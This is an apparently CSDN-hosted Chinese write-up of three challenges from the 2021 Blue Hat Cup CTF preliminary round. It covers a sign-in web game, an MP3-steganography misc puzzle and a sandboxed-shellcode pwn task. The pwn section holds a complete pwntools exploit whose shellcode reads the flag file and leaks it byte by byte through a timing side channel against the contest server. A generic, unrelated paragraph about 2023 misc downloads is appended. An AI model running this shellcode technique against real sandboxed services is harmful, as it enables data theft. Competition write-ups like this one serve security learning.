2021第五届蓝帽杯初赛部分题目wp


前言

本次蓝帽杯初赛做出了三道解出人数最多的题,勉强混个线下。但不得不吐槽一下这届题目。冬奥会这题杂项套了100层娃,头都绕晕了;PWN题的slient是2020年蓝帽杯决赛原题。其他题没做出来,没有发言权。

WEB

Ball_sigin

在这里插入图片描述

签到题,用手机打开,填补3次左上角空缺的单词,完成滑雪游戏即得到flag
在这里插入图片描述
flag{3b2e48de-e328-4267-a8d6-8d17fb3c8889}

PWN

slient

在这里插入图片描述


题目mmap出了一块可执行内存,地址位于0x10000,随后读取shellcode到这块内存上并执行,在执行前使用seccomp禁掉了除去open/write之外的其他所有系统调用,因此无法通过write系统调用直接leak出flag。考虑单字节爆破flag,即读取flag到一块内存区域,随后单字节爆破,在shellcode中设置loop循环,一旦cmp命中即跳转到loop使得程序卡死,否则执行后面的exit系统调用直接崩溃,根据程序的表现可以区分是否命中,注意因为服务器通信不稳定,每次读到一段flag就更新exp中的flag字符串继续向后爆破。

#coding=utf-8
from pwn import *

r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

context.update(arch='amd64',os='linux',log_level='info')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./chall')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]


map_addr = 0x00010000
flag_addr = 0x10700

def exp(dis,char):

    p.recvuntil("Welcome to silent execution-box.\n")
    sc = asm('''
            mov r12,0x67616c66
            push r12
            mov rdi,rsp
            xor esi,esi
            xor edx,edx
            mov al,2
            syscall
            mov rdi,rax
            mov rsi,0x10700
            mov dl,0x40
            xor rax,rax
            syscall
            mov dl, byte ptr [rsi+{}]
            mov cl, {}
            cmp cl,dl
            jz loop
            mov al,60
            syscall
            loop:
            jmp loop
            '''.format(dis,char))
    p.send(sc)
    #p.interactive()

#exp(0,84)

flag = "flag{k33p_qu14t!}"
for i in range(len(flag),18):
    sleep(1)
    log.success("flag : {}".format(flag))
    for j in range(0x100):
        if debug:
            p = process('./chall')
        else:
            p = remote('8.140.177.7',40334)
        try:
            #gdb.attach(p,'b* 0x0000555555554000+0xc94')
            exp(i,j)
            p.recvline(timeout=1)
            flag += chr(j)
            p.send('\n')
            log.success("{} pos : {} success".format(i,chr(j)))
            #sleep(0.5)
            #raw_input()
            p.close()
            break
        except:
            #log.success("{} pos : {} failed ".format(i,chr(j)))
            p.close()

flag{k33p_qu14t!}

MISC

冬奥会_is_coming

在这里插入图片描述

题目拿到手为一张png图片
在这里插入图片描述

binwalk分离得到一个压缩包
在这里插入图片描述

解压得encode.mp3,还有提示密码为8位
在这里插入图片描述

查看mp3文件内容,发现最后有一段多出来的cipher,将十六进制分离出来转换得到emoji暂且不清楚有什么用,猜测为emoji加密,解密emoji发现内容无意义
在这里插入图片描述
在这里插入图片描述

题目名称为冬奥会,猜想8位密码为冬奥会开幕日期20220204,使用mp3stego工具分离出一个文本txt
在这里插入图片描述
在这里插入图片描述

十六进制转换字符串得到如下为office里的wingding字体:
在这里插入图片描述

在https://lingojam.com/WingDing转换为字符串:
在这里插入图片描述

找到github上该项目,下载post-chekout文件

在这里插入图片描述

文件内容如下:
在这里插入图片描述

将内容How_6ad_c0uld_a_1cePeak_be?作为密钥结合之前的emoji,尝试emoji-aes解密(https://aghorler.github.io/emoji-aes/),得到flag
在这里插入图片描述
在这里插入图片描述
flag{e32f619b-dbcd-49bd-9126-5d841aa01767}

  • 10
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手需要前往蓝帽杯竞赛官方网站或相关论坛查找与初赛misc下载相关的公告或指引。这些网站通常会提供下载链接或资源分享的方式,以方便选手获取题目所需的文件或资源。 其次,根据所提供的下载链接,选手可以点击链接进行下载,也可以使用迅雷、qq旋风等下载工具进行高速下载,以确保下载的文件完整和无误。 在完成下载后,选手需要对下载的文件进行验证。可使用md5校验工具对下载后的文件进行校验,以确保文件的完整性和正确性,防止下载过程中出现错误导致文件损坏。 之后,选手可以开始进行miscellaneous题目的解析和答题。首先,解压下载的文件,查看所提供的题目资源、源代码或二进制文件等。根据题目要求和提示,选手可以使用各种工具和技术,如逆向工程、数据分析、密码学等,进行问题的分析和解决,并找出相应的答案或flag。 最后,选手需要将自己的解题过程、思路和答案记录下来,并按照比赛规则的要求提交答案。可以是一个文本文件或截图,或是将解决问题的代码或脚本提交到竞赛平台或指定的邮箱中。 总之,2023蓝帽杯初赛misc下载是参赛选手在参加蓝帽杯网络安全竞赛中所需进行的一项任务。选手需要在蓝帽杯官方网站或相关论坛上获取下载链接并下载题目相关的文件或资源,然后对其进行验证、解析和解决,最后提交答案以完成竞赛的要求。这项任务对选手的网络安全技术、解题思维和团队合作能力都提出了较高的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

youhao108

行行好吧,揭不开锅了~QAQ

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值